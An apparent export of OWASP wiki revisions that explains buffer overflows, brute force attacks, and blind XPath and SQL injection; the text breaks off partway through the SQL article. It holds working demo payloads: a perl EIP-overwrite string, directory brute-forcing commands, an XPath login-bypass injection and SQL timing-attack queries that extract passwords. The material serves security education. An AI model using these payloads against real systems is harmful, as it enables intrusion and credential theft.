The program calls a function, which operate on char type buffer and does no&lt;br /&gt;
checks against overflowing the size assigned to this buffer.&lt;br /&gt;
As an aftermath it is possible to intentionally or unintentionally store more&lt;br /&gt;
data in the buffer what will cause an error. The following question arises:&lt;br /&gt;
The buffer stores only eight characters, so why function printf() displayed twelve?.&lt;br /&gt;
The anserw come off the process memory organisation. Four characters which overflowed&lt;br /&gt;
the buffer also overwrite the value stored in one of the registers, which was&lt;br /&gt;
necessary for the correct function return. Memory continuity resulted in printing&lt;br /&gt;
out the data stored in this memory area.&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
  #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
  void doit(void)&lt;br /&gt;
  {&lt;br /&gt;
          char buf[8];&lt;br /&gt;
&lt;br /&gt;
          gets(buf);&lt;br /&gt;
          printf(&amp;quot;%s\n&amp;quot;, buf);&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
  int main(void)&lt;br /&gt;
  {&lt;br /&gt;
          printf(&amp;quot;So... The End...\n&amp;quot;);&lt;br /&gt;
          doit();&lt;br /&gt;
          printf(&amp;quot;or... maybe not?\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
          return 0;&lt;br /&gt;
  }&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This example is analogous to the first one. In addition before and after doit()&lt;br /&gt;
function we have two calls to function printf().&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Compilation:&lt;br /&gt;
&lt;br /&gt;
  rezos@dojo-labs ~/owasp/buffer_overflow $ gcc example02.c -o example02&lt;br /&gt;
  -ggdb&lt;br /&gt;
  /tmp/cccbMjcN.o: In function `doit':&lt;br /&gt;
  /home/rezos/owasp/buffer_overflow/example02.c:8: warning: the `gets'&lt;br /&gt;
  function is dangerous and should not be used.&lt;br /&gt;
&lt;br /&gt;
  Usage example:&lt;br /&gt;
  rezos@dojo-labs ~/owasp/buffer_overflow $ ./example02&lt;br /&gt;
  So... The End...&lt;br /&gt;
  TEST                   // user data on input&lt;br /&gt;
  TEST                  // print out stored user data&lt;br /&gt;
  or... maybe not?&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Program between two defined printf() calls displays content of the buffer,&lt;br /&gt;
which is filled with data entered by the user.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  rezos@dojo-labs ~/owasp/buffer_overflow $ ./example02&lt;br /&gt;
  So... The End...&lt;br /&gt;
  TEST123456789&lt;br /&gt;
  TEST123456789&lt;br /&gt;
  Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Because of defined size of the buffer (char buf[8]) and filling it with&lt;br /&gt;
thirteen characters of char type, the buffer was overflowed.&lt;br /&gt;
&lt;br /&gt;
If our binary application is in ELF format, then we are able to use an objdump&lt;br /&gt;
program to analise it and find necessery information to exploit buffer overflow&lt;br /&gt;
error.&lt;br /&gt;
&lt;br /&gt;
Below is an output produced by the objdump. From that output we are able to&lt;br /&gt;
find addresses, where printf() is called (0x80483d6 and 0x80483e7).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  rezos@dojo-labs ~/owasp/buffer_overflow $ objdump -d ./example02&lt;br /&gt;
&lt;br /&gt;
  080483be &amp;lt;main&amp;gt;:&lt;br /&gt;
   80483be:       8d 4c 24 04             lea    0x4(%esp),%ecx&lt;br /&gt;
   80483c2:       83 e4 f0                and    $0xfffffff0,%esp&lt;br /&gt;
   80483c5:       ff 71 fc                pushl  0xfffffffc(%ecx)&lt;br /&gt;
   80483c8:       55                      push   %ebp&lt;br /&gt;
   80483c9:       89 e5                   mov    %esp,%ebp&lt;br /&gt;
   80483cb:       51                      push   %ecx&lt;br /&gt;
   80483cc:       83 ec 04                sub    $0x4,%esp&lt;br /&gt;
   80483cf:       c7 04 24 bc 84 04 08    movl   $0x80484bc,(%esp)&lt;br /&gt;
   80483d6:       e8 f5 fe ff ff          call   80482d0 &amp;lt;puts@plt&amp;gt;&lt;br /&gt;
   80483db:       e8 c0 ff ff ff          call   80483a0 &amp;lt;doit&amp;gt;&lt;br /&gt;
   80483e0:       c7 04 24 cd 84 04 08    movl   $0x80484cd,(%esp)&lt;br /&gt;
   80483e7:       e8 e4 fe ff ff          call   80482d0 &amp;lt;puts@plt&amp;gt;&lt;br /&gt;
   80483ec:       b8 00 00 00 00          mov    $0x0,%eax&lt;br /&gt;
   80483f1:       83 c4 04                add    $0x4,%esp&lt;br /&gt;
   80483f4:       59                      pop    %ecx&lt;br /&gt;
   80483f5:       5d                      pop    %ebp&lt;br /&gt;
   80483f6:       8d 61 fc                lea    0xfffffffc(%ecx),%esp&lt;br /&gt;
   80483f9:       c3                      ret&lt;br /&gt;
   80483fa:       90                      nop&lt;br /&gt;
   80483fb:       90                      nop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
If the second call to printf() would inform administrator about user&lt;br /&gt;
logout (e.g. closed session), then we can try to omit this step and&lt;br /&gt;
finish without call to printf().&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
rezos@dojo-labs ~/owasp/buffer_overflow $ perl -e 'print &amp;quot;A&amp;quot;x12&lt;br /&gt;
.&amp;quot;\xf9\x83\x04\x08&amp;quot;' | ./example02&lt;br /&gt;
So... The End...&lt;br /&gt;
AAAAAAAAAAAAu*.&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Application finished its execution with segmentation fault but the second&lt;br /&gt;
call to printf() had no place.&lt;br /&gt;
&lt;br /&gt;
A few words of explanation:&lt;br /&gt;
&lt;br /&gt;
perl -e 'print &amp;quot;A&amp;quot;x12 .&amp;quot;\xf9\x83\x04\x08&amp;quot;' - will print out twelve &amp;quot;A&amp;quot; &lt;br /&gt;
characters and then four characters, which are in fact an address of the &lt;br /&gt;
instruction we want to execute. Why twelve?&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
     8 // size of buf (char buf[8])&lt;br /&gt;
  +  4 // four additional bytes for overwriting stack frame pointer&lt;br /&gt;
  ----&lt;br /&gt;
    12&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Problem analysis:&lt;br /&gt;
&lt;br /&gt;
The issue is the same as in the first example. There is no control over &lt;br /&gt;
the size of the copied buffer into the previously declared one. In this &lt;br /&gt;
example we overwrite EIP register with address 0x080483f9, which is in &lt;br /&gt;
fact call to ret in the last phase of the program execution.&lt;br /&gt;
&lt;br /&gt;
How to use buffer overflow errors in a different way?&lt;br /&gt;
&lt;br /&gt;
Generally explotation of these errors may lead to:&lt;br /&gt;
* application DoS&lt;br /&gt;
* reordering execution of functions&lt;br /&gt;
* code execution (if we are able to inject the shellcode - described in the separate document)&lt;br /&gt;
&lt;br /&gt;
How buffer overflow errors are made?&lt;br /&gt;
&lt;br /&gt;
This kind of errors are very easy to make. For years they were programmer's&lt;br /&gt;
nightmare. The problem lies in native C functions, which don't care about doing&lt;br /&gt;
appropriate buffers length checks. Below is the list of such functions and if exists,&lt;br /&gt;
their safe equivalents:&lt;br /&gt;
&lt;br /&gt;
* gets() -&amp;gt; fgets() - read characters&lt;br /&gt;
* strcpy() -&amp;gt; strncpy() - copy content of the buffer&lt;br /&gt;
* strcat() -&amp;gt; strncat() - buffers concatation&lt;br /&gt;
* sprintf() -&amp;gt; snprintf() - fill buffer with data of different types&lt;br /&gt;
* (f)scanf() - read from STDIN&lt;br /&gt;
* getwd() - return working directory&lt;br /&gt;
* realpath() - return absolut (full) path&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Command Execution]]&lt;br /&gt;
* [[Off-by-one]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[Stack overflow attack]]&lt;br /&gt;
* [[Heap overflow attack]]&lt;br /&gt;
* [[Format string attack]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[Format string]]&lt;br /&gt;
* [[Heap overflow]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* Use safe equivalent functions, which check the buffers length, whenever it's possible.&lt;br /&gt;
&lt;br /&gt;
Namely:&lt;br /&gt;
#gets() -&amp;gt; fgets()&lt;br /&gt;
#strcpy() -&amp;gt; strncpy()&lt;br /&gt;
#strcat() -&amp;gt; strncat()&lt;br /&gt;
#sprintf() -&amp;gt; snprintf()&lt;br /&gt;
&lt;br /&gt;
* These functions which doesn't have their safe equivalents should be rewritten&lt;br /&gt;
with safe checks implemented. Time spent on that will benefit in the future.&lt;br /&gt;
Remember that you have to do it only once.&lt;br /&gt;
&lt;br /&gt;
* Use compilers, which are able to identify unsafe functions, logic errors and&lt;br /&gt;
check if the memory is overwritten when and where it shouldn't be.&lt;br /&gt;
&lt;br /&gt;
[[Category:Data Structure Attacks]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Brute_force_attack&amp;diff=31573</id>
		<title>Brute force attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Brute_force_attack&amp;diff=31573"/>
				<updated>2008-06-15T19:51:28Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: adjustments to new template&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
During this type of attacks the attacker is trying to bypass security mechanisms having a minimal knowledge about them. Using one or more of accessible methods: dictionary attack (with or without mutations), brute-force attack (with given classes of characters e.g.: alphanuerical, special, case (in)sensitive) the attacker is trying to achive his/her goal. Considering a given method, number of tries, efficiency of the system, which conducts the attack and estimated efficiency of the system which is attacked, the attacker is able to calculate for how long the attack will have to lasts. Non brute-force attacks in the other hand, which includes all classes of characters, gives no certeinty of success.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
&lt;br /&gt;
The brute-force attacks are mainly used in the context of guessing passwords and bypassing access control. However there are a lot of tools which uses this techinque to examinate the web service's catalogue structures and seeks interesting, from the attacker's point of view, information. Very often the target of an attack are data in forms (GET/POST) and user's Session-IDs.&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
&lt;br /&gt;
In the first scenerio, where the goal of brute-forcing is to get to know the password in its decrypted form, it may appear that john the ripper (http://www.openwall.com/john/) is a very helpfull tool. TOP10 tools for password cracking with different methods, including brute-force, may be found on&lt;br /&gt;
http://sectools.org/crackers.html.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For testing web services there are tools like:&lt;br /&gt;
 - dirb (http://sourceforge.net/projects/dirb/)&lt;br /&gt;
 - WebRoot (http://www.cirt.dk/tools/webroot/WebRoot.txt)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
dirb belongs to more advanced tools. With its help we are able to:&lt;br /&gt;
 - set cookies&lt;br /&gt;
 - add any HTTP header&lt;br /&gt;
 - use PROXY&lt;br /&gt;
 - mutate objects which were found&lt;br /&gt;
 - test http(s) connections&lt;br /&gt;
 - seek catalogues and/or files using defined dictionaries and templates&lt;br /&gt;
 - and much much more&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The simplest test to perform is:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
rezos@dojo ~/d/owasp_tools/dirb $ ./dirb http://testsite.test/&lt;br /&gt;
-----------------&lt;br /&gt;
DIRB v1.9&lt;br /&gt;
By The Dark Raver&lt;br /&gt;
-----------------&lt;br /&gt;
START_TIME: Mon Jul  9 23:13:16 2007&lt;br /&gt;
URL_BASE: http://testsite.test/&lt;br /&gt;
WORDLIST_FILES: wordlists/common.txt&lt;br /&gt;
SERVER_BANNER: lighttpd/1.4.15&lt;br /&gt;
NOT_EXISTANT_CODE: 404 [NOT FOUND]&lt;br /&gt;
(Location: '' - Size: 345)&lt;br /&gt;
&lt;br /&gt;
-----------------&lt;br /&gt;
&lt;br /&gt;
Generating Wordlist...&lt;br /&gt;
Generated Words: 839&lt;br /&gt;
&lt;br /&gt;
---- Scanning URL: http://testsite.test/ ----&lt;br /&gt;
FOUND: http://testsite.test/phpmyadmin/&lt;br /&gt;
       (***) DIRECTORY (*)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
In the output the attacker is informed that phpmyadmin/ catalogue was found. The attacker who knows that, is now able to perform the attack on this application. In dirb's templates there is among others a dictionary containing information about invalid httpd configuration. This dictionary will detect weaknesses of this kind.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
One of the main problems with tools like dirb is recognition if the given response from the server is expected and reliable. With more advanced server configuration (e.g. with mod_rewrite) automatic tools are unable to determine if server response informs about an error or that the file, which the attacker is after, was found.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Application WebRoot.pl written by CIRT.DK (http://www.cirt.dk/tools/webroot/WebRoot.txt) has embedded mechanisms for parsing server responses and basing on the phrase, wchich was specified by the attacker, it measures if the server response is expected.&lt;br /&gt;
&lt;br /&gt;
E.g.:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Np.&lt;br /&gt;
&lt;br /&gt;
./WebRoot.pl -noupdate -host testsite.test -port 80 -verbose -match &amp;quot;test&amp;quot; -url &amp;quot;/private/&amp;lt;BRUTE&amp;gt;&amp;quot; -incremental lowercase -minimum 1 -maximum 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00&lt;br /&gt;
 o          Webserver Bruteforcing 1.8          o&lt;br /&gt;
 0  ************* !!! WARNING !!! ************  0&lt;br /&gt;
 0  ******* FOR PENETRATION USE ONLY *********  0&lt;br /&gt;
 0  ******************************************  0&lt;br /&gt;
 o       (c)2007 by Dennis Rand - CIRT.DK       o&lt;br /&gt;
 oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00&lt;br /&gt;
&lt;br /&gt;
 [X] Checking for updates                - NO CHECK&lt;br /&gt;
 [X] Checking for False Positive Scan    - OK&lt;br /&gt;
 [X] Using Incremental                   - OK&lt;br /&gt;
 [X] Starting Scan                       - OK&lt;br /&gt;
    GET /private/b HTTP/1.1&lt;br /&gt;
    GET /private/z HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
 [X] Scan complete                       - OK&lt;br /&gt;
 [X] Total attempts                      - 26&lt;br /&gt;
 [X] Sucessfull attempts                 - 1&lt;br /&gt;
 oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00&lt;br /&gt;
&lt;br /&gt;
WebRoot.pl found one file &amp;quot;/private/b&amp;quot; on testsite.test, which contains phrase &amp;quot;test&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Another example is to examine ranges of the variable's values:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./WebRoot.pl -noupdate -host testsite.test -port 80 -verbose -diff &amp;quot;Error&amp;quot; -url &amp;quot;/index.php?id=&amp;lt;BRUTE&amp;gt;&amp;quot; -incremental integer -minimum 1 -maximum 1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Authentication]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[Blind SQL Injection]]&lt;br /&gt;
* [[Blind XPath Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[Weak credentials]]&lt;br /&gt;
* [[J2EE Misconfiguration: Insufficient Session-ID Length]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* [[Salted hashes]]&lt;br /&gt;
* [[Password based authentication]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Probabilistic Techniques]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Blind_XPath_Injection&amp;diff=31572</id>
		<title>Blind XPath Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Blind_XPath_Injection&amp;diff=31572"/>
				<updated>2008-06-15T19:42:54Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: adjustments to new template&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
XPath is a sort of query language that describes how to locate specific elements (including attributes, processing instructions,&lt;br /&gt;
etc.) in an XML document. Since it is a query language, XPath is somewhat similar to Structured Query Language (SQL). However, XPath&lt;br /&gt;
can be used to reference almost any part of any XML document without access control restrictions, whereas with SQL, a &amp;quot;user&amp;quot; (which is a term undefined in the XPath/XML context) may be restricted to certain tables, columns or queries.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information may be found in the article dedicated to [[XPATH Injection]]. Conducting Blind XPath Injection attack the attacker has no knowledge about the structure of the XML document. However his situation is better comparing to [[Blind_SQL_Injection]], because there are functions, which allows for performing tests (XML Crawling) and in the end getting know the document structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
&lt;br /&gt;
Using [[XPATH_Injection]] attack the attacker is able to e.g. log in to the system without entering valid login and password. If he wants to know information about other users he must take one step further. The attacker may be successfull using two methods: Boolenization and XML Crawling. By adding to the XPath syntax, which allows to log in without entering a login and password, additional expressions (replacing what the attacker entered in the place of login to the specially crafted expression).&lt;br /&gt;
&lt;br /&gt;
===Boolenization===&lt;br /&gt;
&lt;br /&gt;
Using so called &amp;quot;Boolenization&amp;quot; method the attacker may find out if the given XPath expression is True or False. Let's assume that the&lt;br /&gt;
aim of the attacker is to log in to the account. Successfull log in would be equal &amp;quot;True&amp;quot; and failed log in attempt would equals &amp;quot;False&amp;quot;. Only a smart portion of the information is analyzed &amp;quot;character&amp;quot; or the number. When the attacker focuses on the string he may reveal it in its entirety by checking every single character within the class/range of characters this string belongs to.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Using ''string-length(S)'' function, where S is a string, the attacker may find out the length of this string. With the appropriate number of ''substring(S,N,1)'' function iterations, where S is a previously mentioned string, N is a start character, and &amp;quot;1&amp;quot; is a next character counting from N character, the attacker is able to find out the whole string.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;data&amp;gt;&lt;br /&gt;
   &amp;lt;user&amp;gt;&lt;br /&gt;
   &amp;lt;login&amp;gt;admin&amp;lt;/login&amp;gt;&lt;br /&gt;
   &amp;lt;password&amp;gt;test&amp;lt;/password&amp;gt;&lt;br /&gt;
   &amp;lt;realname&amp;gt;SuperUser&amp;lt;/realname&amp;gt;&lt;br /&gt;
   &amp;lt;/user&amp;gt;&lt;br /&gt;
   &amp;lt;user&amp;gt;&lt;br /&gt;
   &amp;lt;login&amp;gt;rezos&amp;lt;/login&amp;gt;&lt;br /&gt;
   &amp;lt;password&amp;gt;rezos123&amp;lt;/password&amp;gt;&lt;br /&gt;
   &amp;lt;realname&amp;gt;Simple User&amp;lt;/realname&amp;gt;&lt;br /&gt;
   &amp;lt;/user&amp;gt;&lt;br /&gt;
&amp;lt;/data&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Function:&lt;br /&gt;
&lt;br /&gt;
* ''string.stringlength(//user[position()=1]/child::node()[position()=2])'' returns the length of the second string of the first user (8),&lt;br /&gt;
* ''substring((//user[position()=1]/child::node()[position()=2),1,1)'' returns the first character of this user ('r').&lt;br /&gt;
&lt;br /&gt;
===XML Crawling===&lt;br /&gt;
&lt;br /&gt;
To get to know the XML document structure the attacker may use:&lt;br /&gt;
&lt;br /&gt;
* count(expression)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
count(//user/child::node()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Will return the number of nodes (in this case 2).&lt;br /&gt;
&lt;br /&gt;
* stringlength(string)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
string-length(//user[position()=1]/child::node()[position()=2])=6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Using this query the attacker will find out if the second string (password) of the first node (user 'admin') consists of 6 characters.&lt;br /&gt;
&lt;br /&gt;
* substring(string, number, number)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
substring((//user[position()=1]/child::node()[position()=2]),1,1)=&amp;quot;a&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This query will confirm (True) or deny (False) that the first character of the user ('admin') password is an &amp;quot;a&amp;quot; character.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If the log in form would look like that:&lt;br /&gt;
&lt;br /&gt;
C#:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String FindUser;&lt;br /&gt;
FindUser = &amp;quot;//user[login/text()='&amp;quot; + Request(&amp;quot;Username&amp;quot;) + &amp;quot;' And&lt;br /&gt;
      password/text()='&amp;quot; + Request(&amp;quot;Password&amp;quot;) + &amp;quot;']&amp;quot;;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
then the attacker should inject the following code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Username: ' or substring((//user[position()=1]/child::node()[position()=2]),1,1)=&amp;quot;a&amp;quot; or ''='&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The XPath syntax may remind common [[SQL_Injection]] attacks but the attacker must consider, that this language disallows commenting&lt;br /&gt;
out the rest of expresssion. To ommit this limitation the attacker should use OR expressions to void all expressions, which may disrupt the attack.&lt;br /&gt;
&lt;br /&gt;
Because of ''Boolenization'' the number of queries, even within a small XML document, may be very high (thousands, houndred of thousands and more). That is why this attack is not conducted manually. Knowing few basic XPath functions the attacker is able to write an application in a short time, which will rebuild the structure of the document and will fill it with a data by itself.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Command_Execution]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[Blind_SQL_Injection]]&lt;br /&gt;
* [[XPATH_Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[Injection_problem]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
* http://www.modsecurity.org/archive/amit/blind-xpath-injection.pdf - by Amit Klein (much more detailes, in my opinion the best source about Blind XPath Injection).&lt;br /&gt;
* http://www.ibm.com/developerworks/xml/library/x-xpathinjection.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Blind_SQL_Injection&amp;diff=31510</id>
		<title>Blind SQL Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Blind_SQL_Injection&amp;diff=31510"/>
				<updated>2008-06-15T16:21:17Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: adjustments to new template&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
When an attacker executes SQL Injection attacks sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through sql statements.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
Verification whether sended request returned True or False the attacker may conduct in a few ways:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===(in)visible content===&lt;br /&gt;
&lt;br /&gt;
Having a simple page, which displays article with given ID as the parameter, the attacker may perform a couple simple tests if a page&lt;br /&gt;
is vulnerable to sql injection attack.&lt;br /&gt;
&lt;br /&gt;
Examplary URL:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://newspaper.com/items.php?id=2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sends the following query to the database:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT title, description, body FROM items WHERE ID = 2&lt;br /&gt;
&amp;lt;/prE&amp;gt;&lt;br /&gt;
The attacker may try to inject any (even invalid) query, what should cause to return no results by the query:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://newspaper.com/items.php?id=2 and 1=2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Now the sql query should looks like that:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT title, description, body FROM items WHERE ID = 2 and 1=2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
What means that query is not going to return anything.&lt;br /&gt;
&lt;br /&gt;
If the web application is vulnerable to sql injection, then probably will not return anything. To make sure the attacker will certainly inject a valid query:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://newspaper.com/items.php?id=2 and 1=1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
If the content of the page will be the same, then the attacker is able to distinguish when the query is True of False.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
What next? The only limitations are privileges set up by the database administrator, different SQL dialects and finally the attacker imagination.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===RDBMS fingerprinting===&lt;br /&gt;
&lt;br /&gt;
If the attacker is able to determine when his query returns True or False, then he may fingerprint the RDBMS. This will make the whole&lt;br /&gt;
attack much easier to him. One of the most popular method to do it, is to call functions, which will return the current date. MySQL,&lt;br /&gt;
MS SQL or Oracle have different functions for that, respectively ''now()'', ''getdate()'', and ''sysdate()''.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===timing attack===&lt;br /&gt;
&lt;br /&gt;
Timing  attack depends upon injecting the following MySQL query:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
SELECT IF(expression, true, false)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Using some time taking operation e.g. BENCHMARK(), will delay server&lt;br /&gt;
responses if the expression will be True.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))&amp;lt;/pre&amp;gt; - will execute 5000000 times the ENCODE function.&lt;br /&gt;
&lt;br /&gt;
Depending on the database server performence and its load, it should&lt;br /&gt;
take just a moment to finish this operation. The immportant thing is,&lt;br /&gt;
from the attacker's point of view, to specify high number of BENCHMARK()&lt;br /&gt;
function repetitons, which should affect in a noticeable way the server&lt;br /&gt;
response time.&lt;br /&gt;
&lt;br /&gt;
Examplary combination of both queries:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
If the server response was quite long we may expect, that the first user password character with user_id = 1 is character '2'.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
(CHAR(50) == '2')&lt;br /&gt;
